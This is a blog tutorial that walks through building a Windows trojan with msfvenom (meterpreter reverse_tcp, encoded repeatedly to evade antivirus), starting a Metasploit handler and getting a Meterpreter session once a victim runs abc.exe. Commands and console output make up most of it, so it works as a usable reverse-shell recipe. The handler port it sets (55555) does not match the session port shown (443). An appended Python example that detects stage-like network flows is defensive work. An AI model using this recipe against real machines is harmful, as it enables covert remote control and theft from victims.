Kali Attack and Defense, Chapter 9: Metasploit, My Remote Control Software
Source: Internet  Editor: 程序博客网  Time: 2024/04/29 22:07
Tools to prepare
1. Kali system, IP 10.10.10.131
2. Victim system, IP 10.10.10.133
Steps:
1. Generate the trojan control program
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.10.10.131 LPORT=443 -f exe > abc.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai chosen with final size 468
Payload size: 468 bytes
Note: LHOST and LPORT are the IP address and port of your own local machine, not the victim's.
2. Start Metasploit from the command line
root@kali:~# msfconsole
=[ metasploit v4.11.5-2015103001 ]
+ -- --=[ 1500 exploits - 864 auxiliary - 251 post ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
3. Use the handler module
msf > use exploit/multi/handler
4. View the handler options
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
5. Set the shellcode (payload)
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > SHOW
[-] Unknown command: SHOW.
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.10.131 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
6. Change LHOST and the LPORT port
msf exploit(handler) > set LHOST 10.10.10.131
LHOST => 10.10.10.131
msf exploit(handler) > set LPORT 55555
LPORT => 55555
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.10.131 yes The listen address
LPORT 55555 yes The listen port
7. Run the exploit command
msf exploit(handler) > exploit
8. The victim runs the abc.exe file
9. Verify
[*] Started reverse handler on 10.10.10.131:443
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 10.10.10.133
[*] Meterpreter session 1 opened (10.10.10.131:443 -> 10.10.10.133:1049) at 2015-12-07 23:41:20 +0800
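Seen from the defender's side, the session in step 9 is a host connecting out and immediately receiving an 885806-byte stage on port 443. The following is an added example, not part of the original tutorial, that flags flows of that shape in connection records. The field names are modeled on Zeek's conn.log, and the sample records, thresholds and helper names are constructed assumptions.

```python
# Added example, not from the original tutorial: flag flows shaped like step 9's
# session. Field names follow Zeek conn.log; records and thresholds are constructed.
MIN_STAGE_BYTES = 500_000  # assumption: well below the 885806-byte stage in step 9
MAX_ORIG_BYTES = 1_024     # assumption: the connecting host sends almost nothing first
TLS_PORTS = {443}

# Constructed sample records (not captured traffic).
SAMPLE_FLOWS = [
    {"orig_h": "10.10.10.133", "resp_h": "10.10.10.131", "resp_p": 443,
     "service": "-", "orig_bytes": 0, "resp_bytes": 885806},
    {"orig_h": "10.10.10.133", "resp_h": "10.10.10.131", "resp_p": 55555,
     "service": "-", "orig_bytes": 0, "resp_bytes": 885806},
    {"orig_h": "10.10.10.133", "resp_h": "192.0.2.10", "resp_p": 443,
     "service": "ssl", "orig_bytes": 900, "resp_bytes": 950_000},
    {"orig_h": "10.10.10.140", "resp_h": "10.10.10.20", "resp_p": 445,
     "service": "smb", "orig_bytes": 800, "resp_bytes": 700_000},
    {"orig_h": "10.10.10.140", "resp_h": "192.0.2.10", "resp_p": 443,
     "service": "-", "orig_bytes": 120, "resp_bytes": 300},
]


def is_stage_like(flow):
    """Responder pushes a large blob while the originator stays nearly silent."""
    return (flow["resp_bytes"] >= MIN_STAGE_BYTES
            and flow["orig_bytes"] <= MAX_ORIG_BYTES)


def context(flow):
    """Supporting reasons that make a stage-like flow worth an analyst's time."""
    reasons = []
    if flow["resp_p"] in TLS_PORTS and flow["service"] != "ssl":
        reasons.append("port 443 without a TLS session")
    if flow["service"] == "-":
        reasons.append("no application protocol identified")
    return reasons


def find_suspect_flows(flows):
    """Return (flow, reasons) for stage-like flows with at least one reason."""
    hits = []
    for flow in flows:
        reasons = context(flow)
        if is_stage_like(flow) and reasons:
            hits.append((flow, reasons))
    return hits


if __name__ == "__main__":
    for flow, why in find_suspect_flows(SAMPLE_FLOWS):
        print(f'{flow["orig_h"]} -> {flow["resp_h"]}:{flow["resp_p"]}: ' + "; ".join(why))
```

The TLS download and the SMB transfer in the sample are large and one-sided too, but they carry an identified protocol and are not flagged.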